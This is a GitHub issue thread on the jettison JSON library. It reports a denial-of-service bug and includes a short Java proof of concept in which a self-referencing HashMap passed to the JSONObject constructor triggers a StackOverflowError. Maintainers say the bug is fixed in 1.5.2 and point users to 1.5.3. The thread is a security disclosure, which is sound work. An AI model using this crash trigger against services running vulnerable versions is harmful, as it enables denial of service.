### ISSUE TITLE
If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos

### ISSUE THREAD

**Issue by BIngDiAn-cn** [jettison-json/jettison#52]
poc as follow:

```
public class POC {
    public static void main(String[] args) throws JSONException {


            HashMap<String,Object> map=new HashMap<>();
            map.put("t",map);
            JSONObject jsonObject=new JSONObject(map);

    }
}
```

and the result:

<img width="953" alt="image" src="https://user-images.githubusercontent.com/32029400/200328230-2e1dc144-a183-4ca5-9b5f-eab1acbeb782.png">

**Comment by coheigea** [comment]
Fixed in 1.5.2

**Comment by pjfanning** [comment]
I would recommend that users directed here by the CVE or by Github Security alerts skip straight to v1.5.3. 
v1.5.3 appears to fix some issues that were introduced in v1.5.2. v1.5.2 caused problems for Apache Hadoop tests but v1.5.3 seems to work fine.
